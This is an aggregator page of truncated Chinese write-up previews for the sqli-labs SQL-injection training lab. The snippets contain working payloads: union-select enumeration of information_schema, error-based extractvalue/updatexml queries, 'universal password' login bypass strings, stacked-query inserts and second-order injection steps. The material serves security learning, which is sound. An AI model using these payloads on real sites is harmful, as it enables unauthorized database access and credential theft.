E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
SQLi-Labs
[SQL注入][Basci Challenges]
sqli-labs
学习记录(1-22关)
学习记录前置小知识点系统函数字符串连接函数一般用于替换的语句union操作符盲注小知识点布尔型逻辑判断配合正则注入Payloadexp报错bigint溢出其他基于时间的盲注第一关--字符型注入第二关--数字型注入第三关--构造闭合第四关---闭合sql语句第五关-----盲注第六关------时间盲注与报错注入第七关---文件导入第八关---盲注第九关-----时间盲注第十关-----基于双引号的
Y4tacker
·
2020-08-11 15:04
安全学习
#
Web
WEB系列(一)---------SQL
SQL注入的原理及基础环境sqli-labsWamp(Wamp运行起来任务栏的图标一定要是绿的)问题在Wamp安装
sqli-labs
时由于php版本太高会导致报错,我直接打开phpmyadmin导入.sql
weixinzjh
·
2020-08-11 06:36
【绕WAF系列】绕WAF环境搭建【第一篇】
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01搭建sqli-labs0x02安装狗0x01搭建sqli-labsGithub下载地址https://github.com/Audi-1/
sqli-labs
Agan '
·
2020-08-08 10:55
绕WAF系列
#
sqli-labs
less46
#sqli-labsless46and(selectcount(*)frominformation_schema.tablesgroupbyconcat((selectconcat(schema_name)frominformation_schema.schematalimit2,1),floor(rand(0)*2)))--+?sort=1and(selectcount()frominforma
READER-L
·
2020-08-08 00:46
sqli-labs
sqli-labs
less46
SQLi-Labs
学习笔记(Less 41-50)
点击打开链接Less-41基于错误的POST型单引号字符型注入①先打开网页查看WelcomeDhakkan与之前讲的Less-40的区别:[plain]viewplaincopy$sql="SELECT*FROMusersWHEREid=$idLIMIT0,1";当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,构建payload:[plain]viewplaincopyht
antelope_
·
2020-08-07 23:02
SQL注入
sqli-Labs
————less-46(order by 之后的注入)
前言从这一关开始将会介绍一下orderby相关的注入内容。Less-46源代码:ORDERBY-Error-NumericWelcome Dhakkan ID USERNAME PASSWORD ';echo"";echo"".$row['id']."";echo"".$row['username']."";echo"".$row['password']."";echo"";echo"";
FLy_鹏程万里
·
2020-08-07 23:07
【信息安全】
【渗透测试实战1】
———Sqli-labs实战
sqli-labs
环境搭建
MySQL的相关函数:@@datadir读取数据库路径@@basedirMYSQL获取安装路径1.mid()函数:mid(striing,start,length)string(必需)规定要返回其中一部分的字符串。start(必需)规定开始位置(起始值是1)。length(可选)要返回的字符数。如果省略,则mid()函数返回剩余文本。2.substr()函数:substr(string,start
Trrrrinity
·
2020-08-07 13:54
SQL注入
sqli-labs
Basic Challenges Less 11-12
Less11POST-ErrorBased-Singlequotes-String从题目来看这一关跟之前的都不一样。这是post方式的基于报错的单引号字符型注入。打开链接页面显示如下:先随便输入一个用户名和密码比如ceshiceshi进行尝试再用前几关得到的用户名密码尝试登陆,比如Dumb可以看到登陆成功页面显示的样子。既然这里只有登陆框,题目又提示说是post方式的,那么就抓包看看从拦截的数据包
守卫者
·
2020-08-05 20:03
我的安全之路
sqli-labs
Basic Challenges Less 15-16
Less15POST-Blind-Boolian/timeBased-Singlequotes根据题目判断这一关是基于布尔或者时间的单引号字符型盲注,并且参数提交方式是post。先分别用测试账号和正确账号登录观察页面响应这是用测试账号登录的响应这是用正确账号登录的响应可以看到登陆成功与否变化的只有底部的图片,并没有什么显示位。先判断sql查询语句的结构,添加单引号测试看到仅仅是显示登录失败并没有报
守卫者
·
2020-08-05 20:03
我的安全之路
sqli-labs
Basic Challenges Less 13-14
Less13POST-DoubleInjection-Singlequotes-String-withtwist从题目来看,这一关是变型的单引号字符型双查询注入,而且参数传递方式是post。这里分别用四种报错方法一一注入尝试。首先填写用户名和密码看看页面的显示效果这是随便用一个用户名和密码测试登录的显示这是用正确的用户名和密码登录显示的页面从页面响应的对比来看,都是没有什么显示位的,只不过是画面效
守卫者
·
2020-08-05 20:03
我的安全之路
sqli-labs
Basic Challenges Less 17-18
Less17POST-UpdateQuery-ErrorBased-String这一关是基于报错的字符型更新查询注入,参数提交方式是post。打开页面显示如下很明显是一个更改用户密码的界面。尝试更改Dumb的密码观察页面响应可以看到返回了一张成功更改密码的图片,也是没有多余显示位的。那么这里先判断一下查询语句的结构,在uname参数后面添加单引号页面不仅没有报错,看起来还检测到了我们添加的单引号是
守卫者
·
2020-08-05 20:03
我的安全之路
SQLI-LABS
修炼笔记(五)
写在前面:今天介绍的是post注入。自己总结了一些万能密码:1:"or"a"="a2:')or('a'='a3:or1=1--4:'or1=1--5:a'or'1=1--6:"or1=1--7:'or'a'='a8:"or"="a'='a9:'or''='10:'or'='or'11:1or'1'='1'=112:1or'1'='1'or1=113:'OR1=1%00#然而个人习惯性使用admin
郁离歌
·
2020-08-05 19:12
WEB学习
sqli-labs
靶场知识总结
sqli-labs
靶场知识总结由于我的电脑最近用新系统的时候,还不适应,所以有些通过笔记不见了,/(ㄒoㄒ)/~~我直接写总结吧(有些从注入天书摘抄的,(__)嘻嘻……)基于从服务器接收到的响应▲基于错误的
READER-L
·
2020-08-05 11:52
sqli-labs
docker原理和
Sqli-labs
的搭建和通关(适合新手观看)
1.docker的解释和搭建docker英语译为码头工人,它是一个与虚拟机有异曲同工之妙的软件。是软件开发与测试的好帮手。在虚拟机中,我们需要自己寻找ISO文件搭建环境。而且搭建的系统可以是可视化的界面。而在docker的集成化中,它相当于把ISO文件,公布出来,供你挑选,你可以直接下载已经搭建好环境的系统,但docker不是可视化的,是基于Linux内核的,因此在使用docker之前,你需要了解
余昧不昧
·
2020-08-05 10:24
sqli-labs
靶场通关技巧(1-20)
Less1注入步骤:在参数后面加上单引号,数据库报错,说明存在注入id=1'and1=1--+,返回正常id=1'and1=2--+,返回数据为空,说明这是个基于单引号的字符型注入用二分法逐步判断字段数,此处有3个字段:id=1'orderby3--+确定回显点:id=-1'unionselect1,2,3--+(参数1改成数据库不存在的值,如0或者负数)暴库payload:id=-1'union
见痴
·
2020-08-05 10:36
sql注入
sqli-labs
靶场通关技巧(21-45)
Less21基于’)的cookie报头注入这里在cookie处加密了字符串,将我们的payload经过base64加密即可绕过暴库payload:-admin')unionselect1,2,database()#爆表payload:-admin')unionselect1,2,group_concat(table_name)frominformation_schema.tableswhereta
见痴
·
2020-08-05 10:36
sql注入
mysql
信息安全
安全漏洞
黑盒测试
数据库
sqli-labs
靶场通关技巧(46-65)
Less46Orderby注入,利用报错注入可以爆出数据库信息暴库:?sort=1and(updatexml(1,concat(0x7e,(selectdatabase())),0));爆表:?sort=1and(updatexml(1,concat(0x7e,(selectgroup_concat(table_name)frominformation_schema.tableswheretabl
见痴
·
2020-08-05 10:05
sql注入
数据库
mysql
安全漏洞
信息安全
sql
二次注入——
sqli-labs
第24关
目录第24关原理解析防范第24关提示说:pleaselogintocontinue,请登录以继续。没有账号怎么登录?当然是选择注册盲猜会有个admin的账号,所以注册一个admin'#的账号。密码是12345(上帝视角)此时数据库里admin的密码是admin登录刚刚注册的账号然后为admin'#修改密码为123修改成功(此时真的是修改admin'#的密码吗)(又一次上帝视角)进入数据库,发现ad
ihszg
·
2020-08-05 10:31
sql注入
sql
二次注入
dnslog带出——
sqli-labs
第8关
(每次点击都会重新生成一个随机的子域名,所以避免误点)库名回到第8关,在URL里输入payload,刷新一下http://172.16.11.54/
sqli-labs
/Less-8/?
ihszg
·
2020-08-05 10:31
sql注入
sql
dnslog
xss-labs 6-10关
xss-labs6--10关第6关第7关第8关第9关第10关第6关将上一关的答案输进来查看源代码得到的源代码r后面多了下划线,得,又ban一个经过upload-labs和
sqli-labs
的训练,可以确定应该会有大小写
余昧不昧
·
2020-08-05 09:57
笔记
重闯
Sqli-labs
关卡第二天(5关)
第五关(双注入GET单引号字符型注入-报错时间注入)盲注盲注,BlindSQLInjection基于布尔SQL盲注基于时间的SQL盲注基于报错的SQL盲注核心代码:(不会返回数据库中的数据)1$sql="SELECT*FROMusersWHEREid='$id'LIMIT0,1";2$result=mysql_query($sql);3$row=mysql_fetch_array($result)
笑花大王
·
2020-08-04 07:56
Sqli-labs2-5单引号变形,双引号,双注入
整形是不用单引号闭合的,不要后面注释直接union联合查询就可以了~~接下来就可以继续向第一题那样测试了整型不需要闭合就可以执行后面的语句,字符型的则要闭合http://localhost:9096/
sqli-labs
Recar
·
2020-08-03 21:16
安全
sqli-labs
【
sqli-labs
】 less5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)...
双注入查询可以查看这两篇介绍https://www.2cto.com/article/201302/190763.htmlhttps://www.2cto.com/article/201303/192718.html简而言之就是构造如下的查询,会使得查询结果的一部分通过报错的形式显示出来selectcount(*),concat((selectversion()),floor(rand()*2))
ajxi63204
·
2020-08-03 14:56
SQLi-LABS
学习SQL注入(less 54-less65 )
Less-54你需要在数据库中找到密钥图片.png百度翻译,就是说你最多只能尝试10次,10次之后就会自动重置随机表名,列名,数据表。图片.png单引号闭合发现不会报错图片.png应该是单引号闭合图片.png而且不是oderby注入图片.png3个查询字段图片.png爆表名2xjj4aw1b1图片.png爆字段名id,sessid,secret_XQ1M,tryy图片.png爆数据1>295510
Smi1e_
·
2020-08-01 12:43
sqli-labs
level5-6 双查询注入
目录双查询基本函数双查询注入原理sqli-labs5-6关做法0.前言最近在做
sqli-labs
的靶场,做到5、6关的时候看起来像是盲注,尝试了一下extractvalue报错注入可以直接报错就过去了,
z1挂东南
·
2020-08-01 06:14
SQLi-LABS
学习SQL注入(less 39-less53 )
Less-39单引号闭合根据报错发现是数字型注入图片.png看源码跟less-38一样,都是堆叠注入,只是单引号闭合变为数字型了。图片.png另外分号后面的语句显示的结果是显示不出来的图片.pngLess-40与Less38和Less39一样,就是闭合方式变为('变量'),而且不会报错,需要用盲注猜测闭合方式图片.png不是单引号和双引号闭合图片.png是括号加单引号闭合图片.png同样可以用堆叠
Smi1e_
·
2020-07-31 19:04
Sqli-labs
之Less-18和Less-19
Less-18基于错误的用户代理,头部POST注入(注:这一个模拟的场景是注册登录后的注入)由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP:这里写说几个常用请求头:(上一篇文章详细讲过)HostHost请求报头域主要用于指定被请求资源的Internet主机和端口号。如:Host:localhost:8088User-AgentUser-Ag
红烧兔纸
·
2020-07-30 21:46
Sqli-labs
之Less-34
Less-34基于错误_POST_单引号_字符型_addslashes()_宽字节注入这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?一个参考:Unicode令人混淆的概念,编码这种东
红烧兔纸
·
2020-07-30 21:14
sqli-labs
之宽字节注入
在开始之前我先理一下几种编码,因为我发现我有点混淆,对它们的概念模模糊糊的样子。URL编码:浏览器从表单中获取所有name和value,将name,value参数编码,去掉那些不能传送的字符,作为URL的一部分发给服务器。URL编码规则:每一对name/value之间用&分隔,name和value之间用=分隔,特殊符号用"%+该字符ascll码的十六进制"表示,比如“\”,它的ascii码是92,
南_浔
·
2020-07-30 20:36
#
SQL注入学习笔记
表单注入——
sqli-labs
第11~16关
目录第11关0、万能账号、密码的前提1、判断是否POST注入2、猜测后台SQL语句3、判断闭合符4、查询列数5、找显示位6、查库名7、查表名8、查列名9、找账号密码第12关第13关第14关123456第15关第16关第11关0、万能账号、密码的前提登录的验证方式如下面这种……$Name=$_POST['userName'];$pwd=$_POST['password'];$loginSQL="se
ihszg
·
2020-07-30 19:14
sql注入
sql
sqli-labs
>>Less-1
准备最近刷一下
sqli-labs
,也是一个边学习边实践的过程,希望自己可以坚持下去吧。
YOUNGBC
·
2020-07-30 09:29
sql注入
sqli-labs
新手学习笔记(持续更新)
sqli-labs
环境安装下载地址:https://github.com/Audi-1/
sqli-labs
同时需要安装phpstudy开始前遇到的问题启动phpstudy,发现apache服务可以正常启动
zydbk123456
·
2020-07-30 07:02
SQLi-LABS-Page-1(Basic-Challenges)-less1-22注入教程
less1GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)http://localhost/
sqli-labs
/Less-1/?
zhhy7788
·
2020-07-30 06:03
Writer-up
sqli-labs
闯关学习笔记(六)//第十一关
POST注入post注入,post是php中和get一样是一种传数据的方法。也就是表单传参数所常用的方法。关键部分源码:if(isset($_POST['uname'])&&isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//loggingtheconnectionparameterstoafilef
-5y
·
2020-07-30 06:48
sqli-labs
mysql
sql
sqli-labs
闯关学习笔记(一)
Errorbasedstring这里先说两个前提:1.首先将php版本调至5.5以上,否则没有sql错误回显,而且很奇怪单引号会转义(原因我还没有查到,如果有知道的朋友请告诉我)2.我在github下载的
sqli-labs
-5y
·
2020-07-30 06:48
sqli-labs
sqli-labs
学习笔记 DAY4
sqli-labs
学习笔记DAY4DAY4sqli-labslesson23与lesson1一样,只不过屏蔽了#和–注释符。
Tiumo
·
2020-07-30 06:02
sqli-labs
(less23-less24)
less23报错注入&过滤注释符这关后台查询语句是selectxxxformxxxwhereid='$_GET['id']'limit0,1讲道理其实跟之前的差不多的,只是对--,#这些注释的符号进行了过滤所以最后的payload就是?id=-1'orextractvalue(1,concat('~',(selectschema_namefrominformation_schema.schemat
Xi4or0uji
·
2020-07-30 05:30
sqli-labs
sqli-labs
(less25-less28a)
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长less25or&&and至于怎么绕?大小写:Or、oR重复:oorr、anandd符号:&&、||各种编码:0x.....、unicode然后..........没有然后了(想不到了剩下的payload顺便给一给?id=1'oorrextractvalue(1,concat('~',database()))--+其他的数据表什
Xi4or0uji
·
2020-07-30 05:30
sqli-labs
新版phpstudy下
sqli-labs
的搭建
最近开始学习sql注入,得知
sqli-labs
是一个练手的好地方,可是在搭建
sqli-labs
环境的过程却没有那么顺利,下面记录一下我的经验,这也是我的第一篇文章,写得不好,还请大佬们包含。
咸鱼想翻身
·
2020-07-30 05:22
Sqli-labs
”1~30关“——宝典
写在前面:1.information_schema:为自带数据库table_schema:数据库名table_name:数据表名column_name:字段名2.闭合方式:单引号——'--+双引号——"--+单引号和括号——')--+双引号和括号——")——--+3.注意!输入法英文英文英文!空格小心遗漏!闭合符号小心遗漏!**Less-1**——>1:我们首先判断闭合方式,输入/?id=1页面正
雪景深时不见鹿
·
2020-07-30 05:18
sqli-labs
1——20关攻略
1~10GET传输Less-1联合查询[’]优点:查询方便速度很快缺点:必须要有显示位1、判断sql语句中一共返回了多少列orderby3--+对比如下两张图的显示页面。得知有3列2、查看显示位unionselect1,2,3--+3、爆数据unionselect1,2,database()##当前数据库名4、爆库名unionselect1,database(),schema_namefromin
weixin_45880717
·
2020-07-30 05:13
sqli-labs
41——65关攻略
Less-41基于错误的POST型单引号字符型注入与之前讲的Less-40的区别:sql="SELECT∗FROMusersWHEREid=sql="SELECT*FROMusersWHEREid=sql="SELECT∗FROMusersWHEREid=idLIMIT0,1";当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,构建payload:?id=1;insertin
weixin_45880717
·
2020-07-30 05:43
sqli-labs
练习(第二关)——数字型
172.16.11.222/
sqli-labs
/Less-2/?id=1id=2-1与id=1的结果一样,说明是数字型。2、确认字段位数172.16.11.222/
sqli-labs
/Less-2/?
ihszg
·
2020-07-30 05:30
sql注入
sql
sqli-labs
通关教程(1)
Less-1第一关打开网站在url上加上?id=1’可以看到用户名和密码。下面我们尝试开始注入。探测是否存在注入点:加单引号报错加’and1=1报错加’and1=1--+正常判断为字符型注入一般可以使用联合表的方式来提取自己想要的信息(union),但是使用union语句有个前提就是union后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。所以我们得再来判断有几个字段。id=1
银音铃
·
2020-07-30 05:52
SQLi_Lab闯关
本次在phpstudy环境上部署
sqli-labs
注入平台。
康纳倒拔垂杨柳
·
2020-07-30 05:11
sqli-labs
前20题
Less-1没有别的提示,先尝试用get输入IDid=1/id=1"有正常显示,id=1’出错(字符型注入)id=1'会出错id=1'and'1'='1成功返回,可判断闭合方式为’sql还有个注释方法是–+,测试可行id=1'orderby4--+返回错误,表格为3列并且显示的是后面两列id=0'unionselect1,2,(selectgroup_concat(table_name)fromi
薯条猫
·
2020-07-30 05:38
sqli-labs
闯关记录54-65
54.10次的尝试中从数据库的随机表中转储,每次重置,挑战都会生成随机表名、列名和表数据。payload:?id=3’%23,正常显示,先查看数据库名称。payload:?id=-3’unionselect1,2,database()%23接下来查看表名称。payload:/?id=-3’unionselect1,2,group_concat(table_name)frominformation_
weixin_43938446
·
2020-07-30 04:17
SQL注入学习
sql注入学习基础-基于
sqli-labs
(1-10)-联合查询、盲注、布尔型盲注、时间型盲注
sql注入学习基础-基于
sqli-labs
(1-10)-联合查询、盲注、布尔型盲注、时间型盲注最近学习了一点sql注入的基础。对sql注入有了一点心得,写下学习笔记。
无焉
·
2020-07-30 04:17
安全学习
sqli-labs
笔记(3)post注入、报错注入、双注入
less11单引号报错’’’andpassword=’’LIMIT0,1猜测后台语句为select?whereuname='?'andpasswd='?'构造'or1#登陆成功那在post注入中如何获取数据库中的内容呢根据报错内容获取内容报错注入函数extractvalue(key1,key2):使用xpath语句key2,查询xml文档key1a.确定查询列数orderby2b.使用函数extr
最正经的上班族
·
2020-07-30 04:25
web安全
SQL注入(
sqli-labs
)手工注入+对抗WAF+SQLMAP自动化工具(第二关)
上一篇总结:union联合注入传入数据库的语句:select*fromuserwhereuser_id=“1”unionselect1,2,3–+当前面的产生错误,就执行后面的语句,并将结果返回到前端页面。一.不带WAF情况判断是否存在注入点,注入类型判断存在一个整型注入。(2)判断字段数(3)判断参数位置unionselect根据返回结果发现第2,3位是输入点(4)注出库名和版本和当前登录用户(
渗透之王
·
2020-07-30 04:20
SQLI
上一页
6
7
8
9
10
11
12
13
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他